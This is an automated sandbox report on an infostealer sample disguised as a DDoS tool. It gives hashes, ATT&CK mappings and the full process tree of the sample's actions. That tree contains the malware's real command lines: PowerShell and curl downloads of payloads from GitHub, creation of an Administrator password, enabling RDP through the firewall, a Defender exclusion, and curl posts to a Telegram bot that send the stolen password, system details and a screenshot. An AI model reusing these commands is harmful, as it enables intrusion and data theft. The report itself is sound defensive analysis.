stormkitty | e9662b2692b709414df75045603153e417768e8d64f99639cc7d318cea261660

Resubmissions

26/02/2025, 08:33

250226-kf5y9asjv4 10

26/02/2025, 08:29

250226-kdkkja1qx7 10

Analysis

max time kernel
17s
max time network
69s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250217-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
26/02/2025, 08:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

EZRA DDoS V1.0.exe
Size

6.9MB
MD5

aa5f99414dbd298bae6a72139273e6eb
SHA1

76730e40cda2b49bbd37e0f677afb2fee2382474
SHA256

e9662b2692b709414df75045603153e417768e8d64f99639cc7d318cea261660
SHA512

dce415cc66a581740ec99f2b5f67b8ae999683d7957feba36de8caa916405833cc48a5ce673507bc55a9726e8784f3921014aa4126e734403a88ab8938ed8b4f
SSDEEP

3072:uHwrxmMpvDITZg1S5O5WtjN/02GM1qRJ7CetocaCqbqjywYlnVVkf:BrMZh7dOV/t1qujsVVE

Score

10^/10

stormkitty collection defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000027ef0-117.dat	family_stormkitty
behavioral1/memory/1460-120-0x0000000000250000-0x00000000002A6000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Blocklisted process makes network request 5 IoCs

flow	pid	Process
7	3228	powershell.exe
16	4272	wscript.exe
17	4272	wscript.exe
20	2320	powershell.exe
34	1268	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1976	powershell.exe
5020	powershell.exe
4660	powershell.exe
1268	powershell.exe
3228	powershell.exe
2320	powershell.exe
4596	powershell.exe
3336	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Modifies Windows Firewall 2 TTPs 1 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1072	netsh.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	cscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	wscript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ctestx.vbs	wscript.exe

Executes dropped EXE 1 IoCs

pid	Process
1460	reconstructed.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	reconstructed.exe
Key opened	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	reconstructed.exe
Key opened	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	reconstructed.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	EZRA DDoS V1.0.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File created	C:\ProgramData\OVHNKVWP\FileGrabber\Downloads\desktop.ini	reconstructed.exe
File created	C:\ProgramData\OVHNKVWP\FileGrabber\Pictures\desktop.ini	reconstructed.exe
File created	C:\ProgramData\OVHNKVWP\FileGrabber\Desktop\desktop.ini	reconstructed.exe
File created	C:\ProgramData\OVHNKVWP\FileGrabber\Documents\desktop.ini	reconstructed.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
86	raw.githubusercontent.com
6	raw.githubusercontent.com
7	raw.githubusercontent.com
16	raw.githubusercontent.com
34	raw.githubusercontent.com
81	raw.githubusercontent.com
83	raw.githubusercontent.com
84	raw.githubusercontent.com

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ipinfo.io
20	ipinfo.io
41	freegeoip.app
42	freegeoip.app
61	api.ipify.org
62	api.ipify.org
63	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reconstructed.exe

Delays execution with timeout.exe 3 IoCs

defense_evasion

pid	Process
1680	timeout.exe
3280	timeout.exe
4588	timeout.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
3228	powershell.exe
3228	powershell.exe
2340	WMIC.exe
2340	WMIC.exe
2340	WMIC.exe
2340	WMIC.exe
2320	powershell.exe
2320	powershell.exe
5020	powershell.exe
5020	powershell.exe
3448	WMIC.exe
3448	WMIC.exe
3448	WMIC.exe
3448	WMIC.exe
3584	WMIC.exe
3584	WMIC.exe
3584	WMIC.exe
3584	WMIC.exe
3804	WMIC.exe
3804	WMIC.exe
3804	WMIC.exe
3804	WMIC.exe
4916	WMIC.exe
4916	WMIC.exe
4916	WMIC.exe
4916	WMIC.exe
1976	powershell.exe
1976	powershell.exe
4596	powershell.exe
4596	powershell.exe
1268	powershell.exe
1268	powershell.exe
1268	powershell.exe
4660	powershell.exe
4660	powershell.exe
3336	powershell.exe
3336	powershell.exe
3336	powershell.exe
1460	reconstructed.exe
1460	reconstructed.exe
1460	reconstructed.exe
1460	reconstructed.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3228	powershell.exe
Token: SeIncreaseQuotaPrivilege	2340	WMIC.exe
Token: SeSecurityPrivilege	2340	WMIC.exe
Token: SeTakeOwnershipPrivilege	2340	WMIC.exe
Token: SeLoadDriverPrivilege	2340	WMIC.exe
Token: SeSystemProfilePrivilege	2340	WMIC.exe
Token: SeSystemtimePrivilege	2340	WMIC.exe
Token: SeProfSingleProcessPrivilege	2340	WMIC.exe
Token: SeIncBasePriorityPrivilege	2340	WMIC.exe
Token: SeCreatePagefilePrivilege	2340	WMIC.exe
Token: SeBackupPrivilege	2340	WMIC.exe
Token: SeRestorePrivilege	2340	WMIC.exe
Token: SeShutdownPrivilege	2340	WMIC.exe
Token: SeDebugPrivilege	2340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2340	WMIC.exe
Token: SeRemoteShutdownPrivilege	2340	WMIC.exe
Token: SeUndockPrivilege	2340	WMIC.exe
Token: SeManageVolumePrivilege	2340	WMIC.exe
Token: 33	2340	WMIC.exe
Token: 34	2340	WMIC.exe
Token: 35	2340	WMIC.exe
Token: 36	2340	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2340	WMIC.exe
Token: SeSecurityPrivilege	2340	WMIC.exe
Token: SeTakeOwnershipPrivilege	2340	WMIC.exe
Token: SeLoadDriverPrivilege	2340	WMIC.exe
Token: SeSystemProfilePrivilege	2340	WMIC.exe
Token: SeSystemtimePrivilege	2340	WMIC.exe
Token: SeProfSingleProcessPrivilege	2340	WMIC.exe
Token: SeIncBasePriorityPrivilege	2340	WMIC.exe
Token: SeCreatePagefilePrivilege	2340	WMIC.exe
Token: SeBackupPrivilege	2340	WMIC.exe
Token: SeRestorePrivilege	2340	WMIC.exe
Token: SeShutdownPrivilege	2340	WMIC.exe
Token: SeDebugPrivilege	2340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2340	WMIC.exe
Token: SeRemoteShutdownPrivilege	2340	WMIC.exe
Token: SeUndockPrivilege	2340	WMIC.exe
Token: SeManageVolumePrivilege	2340	WMIC.exe
Token: 33	2340	WMIC.exe
Token: 34	2340	WMIC.exe
Token: 35	2340	WMIC.exe
Token: 36	2340	WMIC.exe
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeIncreaseQuotaPrivilege	3448	WMIC.exe
Token: SeSecurityPrivilege	3448	WMIC.exe
Token: SeTakeOwnershipPrivilege	3448	WMIC.exe
Token: SeLoadDriverPrivilege	3448	WMIC.exe
Token: SeSystemProfilePrivilege	3448	WMIC.exe
Token: SeSystemtimePrivilege	3448	WMIC.exe
Token: SeProfSingleProcessPrivilege	3448	WMIC.exe
Token: SeIncBasePriorityPrivilege	3448	WMIC.exe
Token: SeCreatePagefilePrivilege	3448	WMIC.exe
Token: SeBackupPrivilege	3448	WMIC.exe
Token: SeRestorePrivilege	3448	WMIC.exe
Token: SeShutdownPrivilege	3448	WMIC.exe
Token: SeDebugPrivilege	3448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3448	WMIC.exe
Token: SeRemoteShutdownPrivilege	3448	WMIC.exe
Token: SeUndockPrivilege	3448	WMIC.exe
Token: SeManageVolumePrivilege	3448	WMIC.exe
Token: 33	3448	WMIC.exe
Token: 34	3448	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2256 wrote to memory of 1372	2256	EZRA DDoS V1.0.exe	84
PID 2256 wrote to memory of 1372	2256	EZRA DDoS V1.0.exe	84
PID 1372 wrote to memory of 3228	1372	cmd.exe	86
PID 1372 wrote to memory of 3228	1372	cmd.exe	86
PID 1372 wrote to memory of 4908	1372	cmd.exe	87
PID 1372 wrote to memory of 4908	1372	cmd.exe	87
PID 4908 wrote to memory of 4272	4908	cscript.exe	88
PID 4908 wrote to memory of 4272	4908	cscript.exe	88
PID 1372 wrote to memory of 1680	1372	cmd.exe	89
PID 1372 wrote to memory of 1680	1372	cmd.exe	89
PID 1372 wrote to memory of 2100	1372	cmd.exe	92
PID 1372 wrote to memory of 2100	1372	cmd.exe	92
PID 2100 wrote to memory of 2340	2100	cmd.exe	93
PID 2100 wrote to memory of 2340	2100	cmd.exe	93
PID 4272 wrote to memory of 3220	4272	wscript.exe	97
PID 4272 wrote to memory of 3220	4272	wscript.exe	97
PID 3220 wrote to memory of 2664	3220	cmd.exe	99
PID 3220 wrote to memory of 2664	3220	cmd.exe	99
PID 3220 wrote to memory of 5096	3220	cmd.exe	100
PID 3220 wrote to memory of 5096	3220	cmd.exe	100
PID 5096 wrote to memory of 3588	5096	net.exe	101
PID 5096 wrote to memory of 3588	5096	net.exe	101
PID 3220 wrote to memory of 2440	3220	cmd.exe	102
PID 3220 wrote to memory of 2440	3220	cmd.exe	102
PID 3220 wrote to memory of 1072	3220	cmd.exe	103
PID 3220 wrote to memory of 1072	3220	cmd.exe	103
PID 3220 wrote to memory of 1684	3220	cmd.exe	104
PID 3220 wrote to memory of 1684	3220	cmd.exe	104
PID 1684 wrote to memory of 2320	1684	cmd.exe	105
PID 1684 wrote to memory of 2320	1684	cmd.exe	105
PID 3220 wrote to memory of 3928	3220	cmd.exe	106
PID 3220 wrote to memory of 3928	3220	cmd.exe	106
PID 3928 wrote to memory of 5020	3928	cmd.exe	107
PID 3928 wrote to memory of 5020	3928	cmd.exe	107
PID 3220 wrote to memory of 4396	3220	cmd.exe	108
PID 3220 wrote to memory of 4396	3220	cmd.exe	108
PID 4396 wrote to memory of 3448	4396	cmd.exe	109
PID 4396 wrote to memory of 3448	4396	cmd.exe	109
PID 3220 wrote to memory of 1412	3220	cmd.exe	111
PID 3220 wrote to memory of 1412	3220	cmd.exe	111
PID 1412 wrote to memory of 3584	1412	cmd.exe	112
PID 1412 wrote to memory of 3584	1412	cmd.exe	112
PID 3220 wrote to memory of 1828	3220	cmd.exe	113
PID 3220 wrote to memory of 1828	3220	cmd.exe	113
PID 1828 wrote to memory of 3804	1828	cmd.exe	114
PID 1828 wrote to memory of 3804	1828	cmd.exe	114
PID 3220 wrote to memory of 4248	3220	cmd.exe	115
PID 3220 wrote to memory of 4248	3220	cmd.exe	115
PID 4248 wrote to memory of 4916	4248	cmd.exe	116
PID 4248 wrote to memory of 4916	4248	cmd.exe	116
PID 3220 wrote to memory of 228	3220	cmd.exe	117
PID 3220 wrote to memory of 228	3220	cmd.exe	117
PID 3220 wrote to memory of 1976	3220	cmd.exe	118
PID 3220 wrote to memory of 1976	3220	cmd.exe	118
PID 3220 wrote to memory of 3552	3220	cmd.exe	119
PID 3220 wrote to memory of 3552	3220	cmd.exe	119
PID 3220 wrote to memory of 4596	3220	cmd.exe	120
PID 3220 wrote to memory of 4596	3220	cmd.exe	120
PID 3220 wrote to memory of 1268	3220	cmd.exe	124
PID 3220 wrote to memory of 1268	3220	cmd.exe	124
PID 3220 wrote to memory of 4660	3220	cmd.exe	125
PID 3220 wrote to memory of 4660	3220	cmd.exe	125
PID 3220 wrote to memory of 3336	3220	cmd.exe	126
PID 3220 wrote to memory of 3336	3220	cmd.exe	126

cURL User-Agent 2 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	23	curl/8.7.1
HTTP User-Agent header	29	curl/8.7.1

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	reconstructed.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	reconstructed.exe

C:\Users\Admin\AppData\Local\Temp\EZRA DDoS V1.0.exe
"C:\Users\Admin\AppData\Local\Temp\EZRA DDoS V1.0.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2256
- C:\Windows\SYSTEM32\cmd.exe
 cmd /c tls.bat
 2⤵
 - Suspicious use of WriteProcessMemory
 PID:1372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/spooffewfe/yff/refs/heads/main/ctestx.txt' -OutFile 'C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\ctestx.txt'"
 3⤵
 - Blocklisted process makes network request
 - Command and Scripting Interpreter: PowerShell
 - Suspicious behavior: EnumeratesProcesses
 - Suspicious use of AdjustPrivilegeToken
 PID:3228
- - C:\Windows\system32\cscript.exe
 cscript //nologo "C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\ctestx.vbs"
 3⤵
 - Checks computer location settings
 - Suspicious use of WriteProcessMemory
 PID:4908
 - - C:\Windows\System32\wscript.exe
 "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\ctestx.vbs" /elevated
 4⤵
 Blocklisted process makes network request
 Checks computer location settings
 Drops startup file
 Suspicious use of WriteProcessMemory
 PID:4272
 - - C:\Windows\system32\cmd.exe
 
 C:\Windows\system32\cmd.exe /c ""C:\decoded.bat" "
 5⤵
 Suspicious use of WriteProcessMemory
 
 PID:3220
 - C:\Windows\system32\cacls.exe
 
 "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
 6⤵
 
 PID:2664
 - C:\Windows\system32\net.exe
 
 net user Administrator P@ssw0rdXlazy#
 6⤵
 Suspicious use of WriteProcessMemory
 
 PID:5096
 
 C:\Windows\system32\net1.exe
 
 C:\Windows\system32\net1 user Administrator P@ssw0rdXlazy#
 7⤵
 
 PID:3588
 - C:\Windows\system32\reg.exe
 
 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
 6⤵
 
 PID:2440
 - C:\Windows\system32\netsh.exe
 
 netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
 6⤵
 Modifies Windows Firewall
 Event Triggered Execution: Netsh Helper DLL
 
 PID:1072
 - C:\Windows\system32\cmd.exe
 
 C:\Windows\system32\cmd.exe /c powershell -command "Invoke-WebRequest -Uri 'https://ipinfo.io/json' -UseBasicParsing | ConvertFrom-Json | ForEach-Object { $_.ip + ',' + $_.country }"
 6⤵
 Suspicious use of WriteProcessMemory
 
 PID:1684
 
 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 
 powershell -command "Invoke-WebRequest -Uri 'https://ipinfo.io/json' -UseBasicParsing | ConvertFrom-Json | ForEach-Object { $_.ip + ',' + $_.country }"
 7⤵
 Blocklisted process makes network request
 Command and Scripting Interpreter: PowerShell
 Suspicious behavior: EnumeratesProcesses
 Suspicious use of AdjustPrivilegeToken
 
 PID:2320
 - C:\Windows\system32\cmd.exe
 
 C:\Windows\system32\cmd.exe /c powershell -command "(Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name 'PortNumber').PortNumber"
 6⤵
 Suspicious use of WriteProcessMemory
 
 PID:3928
 
 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 
 powershell -command "(Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name 'PortNumber').PortNumber"
 7⤵
 Command and Scripting Interpreter: PowerShell
 Suspicious behavior: EnumeratesProcesses
 Suspicious use of AdjustPrivilegeToken
 
 PID:5020
 - C:\Windows\system32\cmd.exe
 
 C:\Windows\system32\cmd.exe /c wmic os get Caption /value
 6⤵
 Suspicious use of WriteProcessMemory
 
 PID:4396
 
 C:\Windows\System32\Wbem\WMIC.exe
 
 wmic os get Caption /value
 7⤵
 Suspicious behavior: EnumeratesProcesses
 Suspicious use of AdjustPrivilegeToken
 
 PID:3448
 - C:\Windows\system32\cmd.exe
 
 C:\Windows\system32\cmd.exe /c wmic cpu get Name /value
 6⤵
 Suspicious use of WriteProcessMemory
 
 PID:1412
 
 C:\Windows\System32\Wbem\WMIC.exe
 
 wmic cpu get Name /value
 7⤵
 Suspicious behavior: EnumeratesProcesses
 
 PID:3584
 - C:\Windows\system32\cmd.exe
 
 C:\Windows\system32\cmd.exe /c wmic computersystem get NumberOfLogicalProcessors /value
 6⤵
 Suspicious use of WriteProcessMemory
 
 PID:1828
 
 C:\Windows\System32\Wbem\WMIC.exe
 
 wmic computersystem get NumberOfLogicalProcessors /value
 7⤵
 Suspicious behavior: EnumeratesProcesses
 
 PID:3804
 - C:\Windows\system32\cmd.exe
 
 C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
 6⤵
 Suspicious use of WriteProcessMemory
 
 PID:4248
 
 C:\Windows\System32\Wbem\WMIC.exe
 
 wmic os get TotalVisibleMemorySize /value
 7⤵
 Suspicious behavior: EnumeratesProcesses
 
 PID:4916
 - C:\Windows\system32\curl.exe
 
 curl -s -X POST "https://api.telegram.org/bot7576409440:AAEhYc3BvwzU4FAC7xC6Sc9znSW9OBEtiNs/sendMessage" -d "chat_id=-1002449605159" -d "text=HIT Detected :) ====[HIT INFO]==== [+] System => Microsoft Windows 10 Enterprise LTSC [+] RAM => 3 GB [+] Processor => Intel Core Processor (Broadwell) [+] Cores => 2 [+] IP => 212.102.63.147 [+] Port => 3389 [+] Country => GB [+] User => Administrator [+] Password => P@ssw0rdXlazy# [+] Date => Wed 02/26/2025 8:38 %am_pm" -d "parse_mode=html"
 6⤵
 
 PID:228
 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 
 powershell -Command Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $screen = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds; $bitmap = New-Object System.Drawing.Bitmap($screen.Width, $screen.Height); $graphics = [System.Drawing.Graphics]::FromImage($bitmap); $graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size); $bitmap.Save('C:\Users\Admin\Desktop\screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png); $graphics.Dispose(); $bitmap.Dispose()
 6⤵
 Command and Scripting Interpreter: PowerShell
 Suspicious behavior: EnumeratesProcesses
 
 PID:1976
 - C:\Windows\system32\curl.exe
 
 curl -s -X POST "https://api.telegram.org/bot7576409440:AAEhYc3BvwzU4FAC7xC6Sc9znSW9OBEtiNs/sendPhoto" -F "chat_id=-1002449605159" -F "photo=@C:\Users\Admin\Desktop\screenshot.png"
 6⤵
 
 PID:3552
 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 
 powershell -Command "try { Add-MpPreference -ExclusionPath 'C:\Users\Admin\Documents'; Write-Host 'Access Granted' -ForegroundColor Green } catch { Write-Host 'Failed to Grant Access (Possibly, Try to disable your antivirus) ' -ForegroundColor Red; exit 1 }"
 6⤵
 Command and Scripting Interpreter: PowerShell
 Suspicious behavior: EnumeratesProcesses
 
 PID:4596
 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 
 powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/spooffewfe/yff/refs/heads/main/encrypt.txt' -UseBasicParsing -OutFile 'C:\Users\Admin\Documents\encrypt.txt'"
 6⤵
 Blocklisted process makes network request
 Command and Scripting Interpreter: PowerShell
 Suspicious behavior: EnumeratesProcesses
 
 PID:1268
 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 
 powershell -Command "$encryptedDataBase64 = Get-Content 'C:\Users\Admin\Documents\encrypt.txt' -Raw; $encryptedData = [Convert]::FromBase64String($encryptedDataBase64); $decryptedData = $encryptedData | ForEach-Object { $_ -bxor 123 }; [System.IO.File]::WriteAllBytes('C:\Users\Admin\Documents\reconstructed.exe', $decryptedData)"
 6⤵
 Command and Scripting Interpreter: PowerShell
 Suspicious behavior: EnumeratesProcesses
 
 PID:4660
 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 
 powershell -Command "Start-Process -FilePath 'C:\Users\Admin\Documents\reconstructed.exe' -Verb RunAs -WindowStyle Hidden"
 6⤵
 Command and Scripting Interpreter: PowerShell
 Suspicious behavior: EnumeratesProcesses
 
 PID:3336
 
 C:\Users\Admin\Documents\reconstructed.exe
 
 "C:\Users\Admin\Documents\reconstructed.exe"
 7⤵
 Executes dropped EXE
 Accesses Microsoft Outlook profiles
 Drops desktop.ini file(s)
 System Location Discovery: System Language Discovery
 Suspicious behavior: EnumeratesProcesses
 outlook_office_path
 outlook_win_path
 
 PID:1460
- - C:\Windows\system32\timeout.exe
 timeout /t 2
 3⤵
 - Delays execution with timeout.exe
 PID:1680
- - C:\Windows\system32\cmd.exe
 C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /value
 3⤵
 - Suspicious use of WriteProcessMemory
 PID:2100
 - - C:\Windows\System32\Wbem\WMIC.exe
 wmic csproduct get UUID /value
 4⤵
 Suspicious behavior: EnumeratesProcesses
 Suspicious use of AdjustPrivilegeToken
 PID:2340
- - C:\Windows\system32\cmd.exe
 C:\Windows\system32\cmd.exe /c python -c "import hashlib; print(hashlib.sha256(f'VALID-UNKNOWN-DEVICE'.encode()).hexdigest()[:16].upper())"
 3⤵
 PID:4236
- - C:\Windows\system32\timeout.exe
 timeout /t 2
 3⤵
 - Delays execution with timeout.exe
 PID:3280
- - C:\Windows\system32\curl.exe
 curl -o "C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\main.py" "https://raw.githubusercontent.com/spooffewfe/yff/refs/heads/main/main.py" --silent
 3⤵
 PID:1140
- - C:\Windows\system32\curl.exe
 curl -o "C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\setup.py" "https://raw.githubusercontent.com/spooffewfe/yff/refs/heads/main/setup.py" --silent
 3⤵
 PID:2544
- - C:\Windows\system32\curl.exe
 curl -o "C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\resources\ua.txt" "https://raw.githubusercontent.com/spooffewfe/yff/refs/heads/main/ua.txt" --silent
 3⤵
 PID:3336
- - C:\Windows\system32\curl.exe
 curl -o "C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\requirements.txt" "https://raw.githubusercontent.com/spooffewfe/yff/refs/heads/main/requirements.txt" --silent
 3⤵
 PID:3596
- - C:\Windows\system32\timeout.exe
 timeout /t 2
 3⤵
 - Delays execution with timeout.exe
 PID:4588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\OVHNKVWP\Browsers\Firefox\Bookmarks.txt

Filesize
105B

MD5
2e9d094dda5cdc3ce6519f75943a4ff4

SHA1
5d989b4ac8b699781681fe75ed9ef98191a5096c

SHA256
c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

SHA512
d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

Download Submit
C:\ProgramData\OVHNKVWP\Process.txt

Filesize
4KB

MD5
f262505f91a5656e96d0d4bf5edab77d

SHA1
153ae926257ed1a6cdfdd8ff7e993cb3b4595267

SHA256
8db4ba23a8f11c36aa636dcb4dfe2fc8cda3d3b6361e6f1a4e3fbf910db142ed

SHA512
eb22f33c4b78a86d849d0e2e04580ec86fdd3ab8100377dedadaee9d3c9c61d22139c6d60d7711638135fe2071a5b52371110b6c19d6ba03774fe45a350ce702

Download Submit
C:\ProgramData\OVHNKVWP\Screen.png

Filesize
199KB

MD5
a9f53b6f50f86c67855ed64408fca134

SHA1
f953a758964d9e4f6de72e9e02ebd402fd362333

SHA256
800d34d5fae11e54ccac9974764cdec33b9340d01c9f68eb24e73ffa628cf17e

SHA512
41fbcf3f88b1c123d3293deefef57d3e351c7dc5d6049996df30b925afd2f02aada5e6e76db898c836e1f9ae069305118682fca3bbba1524bb50b07bb204ab3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
ed30ca9187bf5593affb3dc9276309a6

SHA1
c63757897a6c43a44102b221fe8dc36355e99359

SHA256
81fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122

SHA512
1df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ddbce69b410e4819cf63c2d78cef1efc

SHA1
91844be6fdd8a3f07c78437799ccae931258605f

SHA256
648bc93a7aef845cfad6ea718bc6c46055f963bcd1687c5471530f0546413911

SHA512
3b33e1cec7863cf4701081d95334f6a8c5b819fae4204e2e121442ad69b558ce1039bee9a9f998942a74830e90109268e526c56f40f7a503814c924983728c8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
